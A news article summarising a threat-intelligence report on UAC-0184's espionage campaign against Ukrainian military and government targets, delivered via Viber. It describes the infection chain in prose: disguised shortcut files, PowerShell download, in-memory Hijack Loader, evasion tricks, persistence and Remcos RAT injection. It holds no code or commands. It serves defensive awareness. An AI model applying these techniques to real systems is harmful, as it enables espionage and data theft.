A Russia aligned cyber threat actor tracked as UAC-0184 has been observed intensifying its cyber espionage activity against Ukrainian military and government institutions by misusing the Viber messaging platform as an infection vector. According to a recent technical assessment published by the 360 Threat Intelligence Center, the group has sustained high intensity intelligence collection campaigns throughout 2025, signaling a continued focus on sensitive Ukrainian state and defense related targets. The activity highlights how threat actors are increasingly turning to trusted communication platforms to bypass traditional security controls and social engineering defenses.
Also identified by researchers as Hive0156, the group has a history of using war related themes to lure victims into opening malicious content. Earlier campaigns relied primarily on phishing emails crafted to appear relevant to ongoing military or political developments. These messages typically delivered Hijack Loader, a modular malware loader that establishes an initial foothold on compromised systems. Once active, Hijack Loader functions as a delivery mechanism for Remcos RAT, a remote administration tool frequently abused in espionage and data theft operations. The group was first publicly documented by CERT-UA in early January 2024, after which further investigations revealed its experimentation with alternative delivery channels including Signal and Telegram. The most recent findings confirm that the group has further refined this approach by pivoting to Viber, a widely used messaging application.
The latest attack chain begins with malicious ZIP archives sent directly to targets via Viber messages. These archives contain multiple Windows shortcut files that are disguised as official Microsoft Word and Excel documents, making them appear legitimate and relevant to government workflows. When a victim opens one of these files, a decoy document is displayed to reduce suspicion and create the illusion of harmless content. In the background, however, a PowerShell script is triggered that downloads a second ZIP archive named smoothieks.zip from a remote server. This archive is used to reconstruct and deploy Hijack Loader entirely in memory, allowing the malware to evade many traditional file based detection mechanisms.
The deployment process involves a multi stage execution flow that uses advanced evasion techniques such as DLL side loading and module stomping. These methods enable the loader to blend into legitimate processes while bypassing static and behavioral security checks. Once active, Hijack Loader performs an environmental scan to identify installed security software. It checks for products associated with vendors such as Kaspersky, Avast, BitDefender, AVG, Emsisoft, Webroot, and Microsoft by calculating CRC32 hashes of program identifiers. This information allows the malware to adapt its behavior and reduce the risk of detection. The loader also establishes persistence on the infected system by creating scheduled tasks, ensuring it can survive reboots and maintain long term access.
After completing its preparatory steps, Hijack Loader covertly injects Remcos RAT into a legitimate process named chime.exe. This technique further conceals malicious activity and allows the attackers to remotely control the compromised endpoint. Through Remcos, operators gain extensive capabilities including executing additional payloads, monitoring user activity, managing files, and exfiltrating sensitive data. Although Remcos is promoted as legitimate system management software, security researchers note that its powerful surveillance features make it a frequent choice for cyber espionage actors. The 360 Threat Intelligence Center emphasized that the tool provides attackers with both automated batch operations and precise manual control through its graphical interface, enabling sustained and flexible intelligence gathering against high value Ukrainian targets.
Follow the SPIN IDG WhatsApp Channel for updates across the Smart Pakistan Insights Network covering all of Pakistan’s technology ecosystem.
